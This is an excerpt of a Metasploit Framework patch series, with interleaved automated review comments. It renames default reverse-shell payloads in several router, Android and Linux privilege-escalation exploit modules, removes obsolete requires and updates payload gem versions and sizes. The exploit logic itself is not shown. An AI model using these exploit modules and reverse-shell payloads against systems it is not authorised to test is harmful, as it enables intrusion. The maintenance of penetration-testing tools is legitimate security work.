ARCH_X86, ARCH_X64, ARCH_MIPSLE], 'Targets' => @@ -354,7 +352,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) - ], self.class) + ]) =end end diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index feea58dc59..7e3eabad70 100644 
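Review bot: The commented-out `#'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' },` entry in the `@@ -67,7 +65,7 @@` hunk of stagefright_mp4_tx3g_64bit.rb is dead code that this commit keeps in sync with the rename, and nothing in the hunk says why it is disabled. Either enable it or replace it with a one-line comment giving the reason, for example `# No default PAYLOAD is set: <reason, to be supplied by the module author>`. The same applies to the `register_options` call edited in the `@@ -354,7 +352,7 @@` hunk, which appears to sit inside a `=begin`/`=end` block (only the closing `=end` is visible). The info hash around the first of these lines starts and ends outside the hunk.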
--- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' -require 'rex' - class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking @@ -39,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultOptions' => { 'WfsDelay' => 300, - 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp', + 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0, 'Targets' => [ diff --git a/modules/exploits/android/local/put_user_vroot.rb b/modules/exploits/android/local/put_user_vroot.rb index 6dfca95677..bdd8deb2bc 100644 --- a/modules/exploits/android/local/put_user_vroot.rb +++ b/modules/exploits/android/local/put_user_vroot.rb @@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' -require 'rex' - class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking @@ -44,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultOptions' => { 'WfsDelay' => 120, - 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp', + 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0, } diff --git a/modules/exploits/linux/http/dlink_hnap_login_bof.rb b/modules/exploits/linux/http/dlink_hnap_login_bof.rb index 8495659ee5..cf9d9f107d 100644 --- a/modules/exploits/linux/http/dlink_hnap_login_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_login_bof.rb 
@@ -3,15 +3,13 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - # Payload working status: # MIPS: # - all valid payloads working (the ones that we are able to send without null bytes) # ARM: # - inline rev/bind shell works (bind... meh sometimes) # - stager rev/bind shell FAIL -# - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb... +# - meterpreter rev/bind fails with sigsegv standalone, but works under strace or gdb... class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -95,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']), OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']), OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']), - ], self.class) + ]) end def check diff --git a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb index b41217467a..4a04ddc7e1 100644 --- a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb +++ b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'base64' class MetasploitModule < Msf::Exploit::Remote @@ -40,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => true, 'DefaultOptions' => { - 'PAYLOAD' => 'linux/mipsbe/mettle_reverse_tcp' + 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp' }, 'Targets' => [ diff --git a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb index dc2ecb8c44..5498a94f5d 100644 --- a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb +++ b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb 
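Review bot: The payload-status comment in the `@@ -3,15 +3,13 @@` hunk of dlink_hnap_login_bof.rb was renamed mechanically, so `meterpreter rev/bind fails with sigsegv standalone` no longer says which implementation the result was recorded against. The old wording named mettle explicitly, and a reader may now take the line to cover any Linux Meterpreter build. I would keep the implementation visible in the comment: `# - meterpreter (mettle-based) rev/bind fails with sigsegv standalone, but works under strace or gdb...`.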
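Review bot: `SRVPORT` in the option list of the `@@ -95,7 +93,7 @@` hunk of dlink_hnap_login_bof.rb is declared as `OptString` with the string default `'3333'`, so the option's own type does not reject a non-numeric or out-of-range port. `OptPort.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', 3333]),` would let the framework validate the value; before changing it, check that the rest of the module (not visible here) does not depend on the value being a String. `SHELL` and `SHELLARG` are both described as 'Don't change this', which suggests they belong in advanced options or constants rather than in the regular option list. The `register_options` call starts outside the hunk.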
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { - 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp', + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', 'CMDSTAGER::FLAVOR' => 'wget' }, 'Targets' => diff --git a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb index 218d39513d..b2f5c1a4da 100644 --- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb +++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -39,14 +37,14 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 06 2016', 'DefaultOptions' => { - 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp' + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' } )) register_options( [ Opt::RPORT(80) - ], self.class) + ]) deregister_options('URIPATH') end diff --git a/modules/exploits/linux/local/bpf_priv_esc.rb b/modules/exploits/linux/local/bpf_priv_esc.rb index 3ef0164fea..30bfd6b3b3 100644 --- a/modules/exploits/linux/local/bpf_priv_esc.rb +++ b/modules/exploits/linux/local/bpf_priv_esc.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking @@ -43,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Local ], 'DefaultOptions' => { - 'payload' => 'linux/x64/mettle/reverse_tcp', + 'payload' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true, 'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through }, 
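Review bot: The `DefaultOptions` key in the `@@ -43,7 +41,7 @@` hunk of bpf_priv_esc.rb is spelled `'payload'`, while the other modules touched by this patch (futex_requeue, put_user_vroot, huawei_hg532n_cmdinject, mvpower_dvr_shell_exec, netgear_r7000_cgibin_exec) use `'PAYLOAD'`. Since the line is rewritten here anyway, I would normalise it to `'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',`. As far as I know the datastore matches keys case-insensitively, so this is about consistency and grep-ability rather than behaviour. The same lowercase spelling is in the ntfs3g_priv_esc.rb and allwinner_backdoor.rb hunks of this patch; the info hash itself starts and ends outside the hunk.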
@@ -56,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Local OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]), OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 120 ]) - ], self.class) + ]) end def check diff --git a/modules/exploits/linux/local/ntfs3g_priv_esc.rb b/modules/exploits/linux/local/ntfs3g_priv_esc.rb index c77de2e172..08ee7e2566 100644 --- a/modules/exploits/linux/local/ntfs3g_priv_esc.rb +++ b/modules/exploits/linux/local/ntfs3g_priv_esc.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking @@ -41,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local ], 'DefaultOptions' => { - 'payload' => 'linux/x64/mettle/reverse_tcp', + 'payload' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true, }, 'DefaultTarget' => 1, @@ -51,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local )) register_options([ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) - ], self.class) + ]) end def check diff --git a/modules/exploits/multi/local/allwinner_backdoor.rb b/modules/exploits/multi/local/allwinner_backdoor.rb index 52cc1e182f..94b376abc2 100644 --- a/modules/exploits/multi/local/allwinner_backdoor.rb +++ b/modules/exploits/multi/local/allwinner_backdoor.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require "msf/core" - class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking @@ -35,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Local "Platform" => [ "android", "linux" ], "DisclosureDate" => "Apr 30 2016", "DefaultOptions" => { - "payload" => "linux/armle/mettle/reverse_tcp" + "payload" => "linux/armle/meterpreter/reverse_tcp" }, "Privileged" => true, "Arch" => ARCH_ARMLE, 
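Review bot: The `MAXWAIT` description in the `@@ -56,7 +54,7 @@` hunk of bpf_priv_esc.rb states the unit twice (`'Max seconds to wait for decrementation in seconds'`) and does not say what is being decremented. While the option list is being edited, a clearer string would be `OptInt.new('MAXWAIT', [ true, 'Max time to wait for decrementation, in seconds', 120 ])`, ideally also naming the counter involved. The `register_options` call starts outside the hunk.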
From 7c11e0065dd0b6e609e31807af69d795909e73ea Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 26 Apr 2017 18:00:50 -0500 Subject: [PATCH 6/7] update mettle --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 006ba6c495..96e2f0ec34 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -46,7 +46,7 @@ PATH metasploit-model metasploit-payloads (= 1.2.24) metasploit_data_models - metasploit_payloads-mettle (= 0.1.8) + metasploit_payloads-mettle (= 0.1.9) msgpack nessus_rest net-ssh @@ -233,7 +233,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.1.8) + metasploit_payloads-mettle (0.1.9) mime-types (3.1) mime-types-data (~> 3.2015) mime-types-data (3.2016.0521) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b72f48153b..8d04309da2 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -67,7 +67,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.2.24' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.8' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.9' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 480a0b4273e5e853e38d3ea9661cd95c4c41c91b Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Wed, 26 Apr 2017 18:02:14 -0500 Subject: [PATCH 7/7] update payload sizes --- .../payloads/singles/linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb | 2 +- 24 files changed, 24 insertions(+), 24 deletions(-) 
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index de51b8ac8f..b7a6ca97c7 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 646808 + CachedSize = 650024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index eed97cb69c..776a0426f4 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 646808 + CachedSize = 650024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 8ca59fe4d0..a7f546bc9a 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 646808 + CachedSize = 650024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index c1e17751ff..1b0d8eb5d3 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 639520
+ CachedSize = 642304
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
index fc35312f1a..505a2331bb 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 639520
+ CachedSize = 642304
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
index 5ee0c63881..59589b16d8 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
 module MetasploitModule
- CachedSize = 639520
+ CachedSize = 642304
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
index 676228da47..121a74192e 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 638320
+ CachedSize = 641064
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
index 45e065ce68..9efd3163dc 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 638320
+ CachedSize = 641064
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
index bbc1472a37..2b502807d0 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
 module MetasploitModule
- CachedSize = 638320
+ CachedSize = 641064
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
index 1fb23e0ba5..bb3df3f2ae 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1019344
+ CachedSize = 1023816
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
index cca7335f5f..6d518cce06 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1019344
+ CachedSize = 1023816
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
index a4e2037ae9..6966468f86 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
 module MetasploitModule
- CachedSize = 1019344
+ CachedSize = 1023816
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
index da77150e78..82dde575dc 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 997900
+ CachedSize = 1002328
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
index 186eec725c..95e367a69d 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 997900
+ CachedSize = 1002328
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
index e4d453a55c..e2a9bf891f 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
 module MetasploitModule
- CachedSize = 997900
+ CachedSize = 1002328
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
index cad8178fa2..661f405c2f 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 997996
+ CachedSize = 1002424
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
index a2cbb51c1a..a884d7486d 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 997996
+ CachedSize = 1002424
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
index d575313a72..dd08d2ecfa 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
 module MetasploitModule
- CachedSize = 997996
+ CachedSize = 1002424
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
index 4e16a425c8..67da838251 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 739644
+ CachedSize = 743740
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
index a8f346b575..baef1d8db0 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 739644
+ CachedSize = 743740
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
index 035a13fcb2..96a94d4fb1 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 739644
+ CachedSize = 743740
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
index 8f85d9d377..7ffff62493 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 864336
+ CachedSize = 864376
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
index 479cdb1b8d..24fccb538f 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 864336
+ CachedSize = 864376
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
index 84e533fe8d..ae3216eee1 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 864336
+ CachedSize = 864376
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions